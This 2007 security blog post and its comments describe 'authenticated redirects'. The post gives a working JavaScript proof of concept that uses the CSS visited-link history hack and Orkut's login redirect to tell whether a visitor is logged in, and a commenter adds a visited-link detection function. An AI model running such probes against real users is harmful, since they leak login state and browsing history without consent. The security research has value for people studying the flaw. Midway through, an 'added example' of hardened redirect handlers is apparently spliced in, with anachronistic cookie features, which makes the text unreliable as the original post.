Monday, January 01, 2007

More Logged In User Detection via Authenticated Redirects

Ok, so what's changed since the 30th, when I posted about this under a different name (Semi-Open Redirects)? Well, I thought of a better name and some new ways to exploit Authenticated Redirects.

Authenticated redirects should be self-explanatory, but essentially I just mean redirects which don't redirect you if you aren't logged on (or ones which redirect you only if you aren't logged on, but it's a good enough name for me anyway).

Now, in my post about Semi-Open redirects, one of the constraints I hadn't thought of a circumvention for was the need to have an open redirect, so you could control where it redirects.

Since then I've realised that it's not always necessary to control where the redirect sends users, because we can already check whether a user has visited a page through the CSS history hack!

Some common types of authenticated redirects which you can find on the internet are download pages which you need to log in to view, which use redirects to track how many people are getting sent to each download or other link.

But anyway, these redirects are abundant, so here's the source to a working PoC for Orkut:
<html>
<body>
<script type="text/javascript">
    // Runs once the hidden iframe has finished loading (after any redirect).
    // temp.href is still the login URL for the random value chosen below; if
    // that URL is now :visited, the iframe was bounced to the login page.
    function iframe_callback() {
        if (temp.offsetHeight == 1) {
            alert('You are NOT logged into Orkut.');
        } else {
            alert('You ARE logged into Orkut.');
        }
        c.removeChild(temp);
        document.body.removeChild(orkut_iframe);
    }

    // CSS history hack: a visited link becomes a 1px block, an unvisited one does not.
    document.write( '<style type="text/css">#nicked a:link{color:#fff;}' );
    document.write( '#nicked a:visited{height:1px;width:1px;display:block;overflow:hidden;margin:1px;}' );
    document.write( '#nicked{font-size:1px;overflow:hidden;height:1px;margin:0;padding:0;}</style>' );
    var c = document.createElement('div');
    c.id = 'nicked';
    document.body.appendChild(c);

    var visited = true;
    var temp = document.createElement('a');
    temp.innerHTML = 'test';
    c.appendChild(temp);
    var random, link;

    // Pick a random value whose login URL is not already in the history, so a
    // later :visited hit can only have come from the iframe load below.
    while (visited == true) {
        random = Math.floor(Math.random() * 1000000);
        link = 'https://www.orkut.com/GLogin.aspx?done=https%3A%2F%2Fwww.orkut.com%2FNews.aspx%3Ftest%3D' + random;

        temp.href = link;
        if (temp.offsetHeight != 1) {
            visited = false;
        }
    }

    // Load the authenticated page in a hidden iframe; Orkut redirects it to
    // GLogin.aspx?done=<that URL> only when the user is not logged in.
    var orkut_iframe = document.createElement('iframe');
    orkut_iframe.src = 'https://www.orkut.com/News.aspx?test=' + random;
    orkut_iframe.style.display = 'none';
    document.body.appendChild(orkut_iframe);
    // Set onload after appending: IE only honours it once the element is in the document (see comments).
    orkut_iframe.onload = iframe_callback;
</script>
</body>
</html>


Note: This PoC works on the principle that Orkut redirects you to a login page with the URL of where you wanted to go in the URL, and so we create a URL with a random number appended to it, and then we see if you were redirected to the login URL.
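To show where the leak actually lives on the server side, here is an added example (not code from the post or from Orkut) modelling the redirect handler the PoC relies on next to a hardened variant: the oracle exists because the login URL echoes the attacker-chosen destination, so a unique `done=` value makes a single :visited probe decisive. Both handlers are hypothetical pure functions returning a response object; the origin and URL shapes are taken from the PoC.

```javascript
// Added example, not from the post: the authenticated-redirect pattern the PoC
// probes, modelled as pure functions that return { status, headers }.
const ORIGIN = 'https://www.orkut.com';   // origin used by the post's PoC

// Vulnerable: the requested URL is reflected into the login redirect, so the
// URL that lands in the browser history is unique per attacker-chosen value.
function redirectVulnerable(requestUrl, loggedIn) {
  if (loggedIn) return { status: 200, headers: {} };
  return {
    status: 302,
    headers: { Location: ORIGIN + '/GLogin.aspx?done=' + encodeURIComponent(requestUrl) },
  };
}

// Hardened: the login URL is constant, so its :visited state only says "has
// ever seen the login page", not "was redirected from my random URL". The
// destination travels in a short-lived cookie after same-origin validation.
// Caveat: this removes the per-visit oracle but not the browser-side :visited
// leak itself; that needs the browser's visited-link style restrictions.
function redirectHardened(requestUrl, loggedIn) {
  if (loggedIn) return { status: 200, headers: {} };
  const headers = { Location: ORIGIN + '/GLogin.aspx' };
  const dest = safeDestination(requestUrl);
  if (dest) {
    headers['Set-Cookie'] = 'done=' + encodeURIComponent(dest) +
      '; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=300';
  }
  return { status: 302, headers };
}

// Accept only same-origin destinations, returned as path + query (no open redirect).
function safeDestination(url) {
  let parsed;
  try { parsed = new URL(url, ORIGIN); } catch (e) { return null; }
  if (parsed.origin !== ORIGIN) return null;
  return parsed.pathname + parsed.search;
}

// Does the Location that ends up in history depend on the value the attacker
// appended? true means the per-visit oracle from the post exists.
function locationLeaksDestination(handler) {
  const a = handler(ORIGIN + '/News.aspx?test=1', false).headers.Location;
  const b = handler(ORIGIN + '/News.aspx?test=2', false).headers.Location;
  return a !== b;
}
```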

Oh, and credit to Christian Heilmann whose CSS detecting code I essentially stole, because he was the first one smart enough to get it working in all browsers and post the working version in a comment on Jeremiah's blog. If anyone is interested I ripped the code from here: http://icant.co.uk/sandbox/nickhistory.html

4 comments:

Anonymous said...

Alex, I've got a better working cross browser version because both versions I saw did not work for me. And the visited link color (purple) is also correct in my example. I have not tested it in Opera, but MSIE & FF work.

Like:

function isVisitedLink(el) {
    var x = document.getElementById(el);
    var y;
    if (x.currentStyle) {
        // MSIE
        y = x.currentStyle['color'];
    } else if (window.getComputedStyle) {
        // Mozilla/Gecko and other DOM Level 2 browsers
        y = document.defaultView.getComputedStyle(x, null).getPropertyValue('color');
    }

    // Check visited link color (default purple):
    if (y == '#800080') {
        // MSIE color
        return true;
    }
    if (y == "rgb(128, 0, 128)") {
        // Mozilla/Gecko color
        return true;
    }
    return false;
}

-Jungsonn

kuza55 said...

Hmmm, I must have forgotten to test it in IE, my mistake, I'll try to figure out what is causing it to not work.....

And the reason I didn't use link colour is because people were reporting problems with IE not displaying the link colour properly if the links were added after the document had loaded.

Does that code you posted solve the problem?

Anonymous said...

Hi Alex.

Yes, it worked for me on all levels.
I made a PoC last year:

http://www.jungsonnstudios.com/cool.php

To see the example:

1) turn on javascript
2) do not have "safe cache" ext. installed.
3) cache must be turned on in the browser.

If it doesn't work, I'd really like to hear it from you.

-Jungsonn

kuza55 said...

I'll get something working soon then. I figured out one of the problems that PoC has in IE - it's that onload attributes can seemingly only be set after the element has been appended to an object, so swapping those two lines around gets the code executing, but for some reason the CSS detection just doesn't seem to work.

How I hate writing PoC code......It's so much work, so much undocumented crap (well, with IE anyway, Firefox has good javascript docs) and it's not even as if I'm ever going to personally use it......Oh well, I'll still fix it.....